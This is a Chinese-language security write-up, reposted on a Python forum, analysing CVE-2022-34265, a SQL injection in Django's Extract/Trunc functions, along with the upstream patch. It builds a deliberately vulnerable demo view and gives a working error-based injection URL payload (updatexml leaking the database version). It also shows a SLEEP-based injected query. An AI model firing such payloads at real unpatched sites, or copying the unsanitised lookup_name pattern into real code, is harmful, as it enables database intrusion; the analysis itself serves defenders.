社区所有版块导航
Python
python开源   Django   Python   DjangoApp   pycharm  
DATA
docker   Elasticsearch  
aigc
aigc   chatgpt  
WEB开发
linux   MongoDB   Redis   DATABASE   NGINX   其他Web框架   web工具   zookeeper   tornado   NoSql   Bootstrap   js   peewee   Git   bottle   IE   MQ   Jquery  
机器学习
机器学习算法  
Python88.com
反馈   公告   社区推广  
产品
短视频  
印度
印度  
Py学习  »  Django

Django SQL注入漏洞分析|CVE-2022-34265

山石网科安全技术研究院 • 1 年前 • 490 次点击  
影响范围

  • Django 3.2.x prior to 3.2.14
  • Django 4.0.x prior to 4.0.6

漏洞复现

环境搭建

  • 安装Django

    python -m pip install Django==4.0.2
  • 创建app

    startapp tt
  • 创建model

    from django.db import models


    # Create your models here.
    class exp(models.Model):
        start_datetime = models.DateTimeField()
        start_date = models.DateField(null=True, blank=True)
        start_time = models.TimeField(null=True, blank=True)

        class Meta:
            db_table = "exp"



  • 创建view

    from django.db.models.functions import Extract, Trunc
    from django.http import HttpResponse
    from django.shortcuts import render


    # Create your views here.
    from .models import exp


    def extractexp(request):
        lookup_name =request.GET.get('name')
        e = exp.objects.filter(start_date__year=Extract('start_datetime',lookup_name)).exists()
        return HttpResponse('extract')

  • urls.py

    from django.urls import path

    from . import views

    urlpatterns = [
        path('extractexp', views.extractexp, name='extractexp')
    ]
  • 项目下的urls.py

    from django.contrib import admin
    from django.urls import path, include

    urlpatterns = [
        path('admin/', admin.site.urls),
        path('exp/', include("tt.urls")),
    ]

  • settings.py注册app

    # Application definition

    INSTALLED_APPS = [
        'tt.apps.TtConfig',
        'django.contrib.admin',
        'django.contrib.auth',
        'django.contrib.contenttypes',
        'django.contrib.sessions',
        'django.contrib.messages',
        'django.contrib.staticfiles',
    ]
  • 配置数据库

    DATABASES = {
        'default': {
            'ENGINE''django.db.backends.mysql',       # 选择数据库为MySQL
            'NAME''django',                            # 数据库名称
            'HOST''127.0.0.1',                        # 主机地址
            'PORT'3306,                               # 数据库服务端口,MySQL是3306
            'USER''root',                             # 数据库账户
            'PASSWORD''root'                        # 数据库密码,如果没有密码,该项为空。
        }
    }
  • 更新数据库

    makemigrations
    migrate

payload

http://127.0.0.1:8000/exp/extractexp?name=YEAR FROM start_datetime)) and updatexml(1,concat(1,(select version()),1),1)-- 

漏洞分析

查看MySQL日志

SELECT (1AS `a` FROM `exp` WHERE EXTRACT(YEAR FROM `exp`.`start_date`) = (EXTRACT(YEAR FROM START_DATETIME)) AND SLEEP(2)-- FROM `exp`.`start_datetime`)) LIMIT 1

概述

漏洞点在于 Django 数据库函数中的两个日期函数:TruncExtract

Extract 用于提取日期,可以提取日期字段中的年、月、日等信息, Trunc 则用于截取,比如 2000-01-01 11:11:11 ,可以根据需求获取到日期 2000-01-01

漏洞的关键点在于将未过滤的数据传递给 kindlookup_name 时,会被拼接到SQL语句中,最终导致 SQL 注入漏洞。

class Extract(TimezoneMixin, Transform):
    lookup_name = None
    output_field = IntegerField()

    def __init__(self, expression, lookup_name=None, tzinfo=None, **extra):
        if self.lookup_name is None:
            self.lookup_name = lookup_name
        if self.lookup_name is None:
            raise ValueError('lookup_name must be provided')
        self.tzinfo = tzinfo
        super().__init__(expression, **extra)

    def as_sql(self, compiler, connection):
        sql, params = compiler.compile(self.lhs)
        lhs_output_field = self.lhs.output_field
        if isinstance(lhs_output_field, DateTimeField):
            tzname = self.get_tzname()
            sql = connection.ops.datetime_extract_sql(self.lookup_name, sql, tzname)
        elif self.tzinfo is not None:
            raise ValueError('tzinfo can only be used with DateTimeField.')
        elif isinstance(lhs_output_field, DateField):
            sql = connection.ops.date_extract_sql(self.lookup_name, sql)
        elif isinstance(lhs_output_field, TimeField):
            sql = connection.ops.time_extract_sql(self.lookup_name, sql)
        elif isinstance(lhs_output_field, DurationField):
            if not connection.features.has_native_duration_field:
                raise ValueError('Extract requires native DurationField database support.')
            sql = connection.ops.time_extract_sql(self.lookup_name, sql)
        else:
            # resolve_expression has already validated the output_field so this
            # assert should never be hit.
            assert False"Tried to Extract from an invalid type."
        return sql, params

    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        copy = super().resolve_expression(query, allow_joins, reuse, summarize, for_save)
        field = getattr(copy.lhs, 'output_field'None)
        if field is None:
            return copy
        if not isinstance(field, (DateField, DateTimeField, TimeField, DurationField)):
            raise ValueError(
                'Extract input expression must be DateField, DateTimeField, '
                'TimeField, or DurationField.'
            )
        # Passing dates to functions expecting datetimes is most likely a mistake.
        if type(field) == DateField and copy.lookup_name in ('hour''minute''second'):
            raise ValueError(
                "Cannot extract time component '%s' from DateField '%s'." % (copy.lookup_name, field.name)
            )
        if (
            isinstance(field, DurationField) and
            copy.lookup_name in ('year''iso_year''month''week''week_day''iso_week_day''quarter')
        ):
            raise ValueError(
                "Cannot extract component '%s' from DurationField '%s'."
                % (copy.lookup_name, field.name)
            )
        return copy



    
class Trunc(TruncBase):

    # RemovedInDjango50Warning: when the deprecation ends, remove is_dst
    # argument.
    def __init__(self, expression, kind, output_field=None, tzinfo=None, is_dst=timezone.NOT_PASSED, **extra):
        self.kind = kind
        super().__init__(
            expression, output_field=output_field, tzinfo=tzinfo,
            is_dst=is_dst, **extra
        )

分析

在 Django 框架自带的 ORM 模型中,当进行 SQL 查询操作时,将调用 django/db/models/query.pyQuerySet 类中对应方法进行处理。

def exists(self):
    if self._result_cache is None:
        return self.query.has_results(using=self.db)
    return bool(self._result_cache)

跟进到 django/db/models/sql/compiler.py 的 SQLCompiler#compile

def compile(self, node):
    vendor_impl = getattr(node, 'as_' + self.connection.vendor, None)
    if vendor_impl:
        sql, params = vendor_impl(self, self.connection)
    else:
        sql, params = node.as_sql(self, self.connection)
    return sql, params

继续跟进到 django/db/models/functions/datetime.py 的 Extract#as_sql

def as_sql(self, compiler, connection):
    sql, params = compiler.compile(self.lhs)
    lhs_output_field = self.lhs.output_field
    if isinstance(lhs_output_field, DateTimeField):
        tzname = self.get_tzname()
        sql = connection.ops.datetime_extract_sql(self.lookup_name, sql, tzname)
    elif self.tzinfo is not None:
        raise ValueError('tzinfo can only be used with DateTimeField.')
    elif isinstance(lhs_output_field, DateField):
        sql = connection.ops.date_extract_sql(self.lookup_name, sql)
    elif isinstance(lhs_output_field, TimeField):
        sql = connection.ops.time_extract_sql(self.lookup_name, sql)
    elif isinstance(lhs_output_field, DurationField):
        if not connection.features.has_native_duration_field:
            raise ValueError('Extract requires native DurationField database support.')
        sql = connection.ops.time_extract_sql(self.lookup_name, sql)
    else:
        # resolve_expression has already validated the output_field so this
        # assert should never be hit.
        assert False"Tried to Extract from an invalid type."
    return sql, params

因为 demo 中选择的字段 start_datetime 属于 DateTimeField 类型,条件跳转到 datetime_extract_sql 函数

跟进到 django/db/backends/mysql/operations.py 的 DatabaseOperations#datetime_extract_sql

def datetime_extract_sql


    
(self, lookup_type, field_name, tzname):
    field_name = self._convert_field_to_tz(field_name, tzname)
    return self.date_extract_sql(lookup_type, field_name)

继续跟进到 date_extract_sql 函数

def date_extract_sql(self, lookup_type, field_name):
    # https://dev.mysql.com/doc/mysql/en/date-and-time-functions.html
    if lookup_type == 'week_day':
        # DAYOFWEEK() returns an integer, 1-7, Sunday=1.
        return "DAYOFWEEK(%s)" % field_name
    elif lookup_type == 'iso_week_day':
        # WEEKDAY() returns an integer, 0-6, Monday=0.
        return "WEEKDAY(%s) + 1" % field_name
    elif lookup_type == 'week':
        # Override the value of default_week_format for consistency with
        # other database backends.
        # Mode 3: Monday, 1-53, with 4 or more days this year.
        return "WEEK(%s, 3)" % field_name
    elif lookup_type == 'iso_year':
        # Get the year part from the YEARWEEK function, which returns a
        # number as year * 100 + week.
        return "TRUNCATE(YEARWEEK(%s, 3), -2) / 100" % field_name
    else:
        # EXTRACT returns 1-53 based on ISO-8601 for the week number.
        return "EXTRACT(%s FROM %s)" % (lookup_type.upper(), field_name)

直接进入到else分支,对来自 GET 请求参数最终赋值到 lookup_type 参数,只是进行了大写转换,但没有进行任何检查,直接拼接到 SQL 查询语句中。

补丁分析

对比 Django 4.0.6版本:https://github.com/django/django/releases/tag/4.0.6

django/db/models/functions/datetime.py 的 Extract#as_sql 增减了一个判断:

if not connection.ops.extract_trunc_lookup_pattern.fullmatch(self.lookup_name):
            raise ValueError("Invalid lookup_name: %s" % self.lookup_name)

跟进到 django/db/backends/base/operations.py 中的BaseDatabaseOperations 类,其中赋值了正则 extract_trunc_lookup_pattern

extract_trunc_lookup_pattern = _lazy_re_compile(r"[\w\-_()]+")

参考

https://www.modb.pro/db/412151

https://cn-sec.com/archives/1173829.html

              
Python社区是高质量的Python/Django开发社区
本文地址:http://www.python88.com/topic/138830
 
490 次点击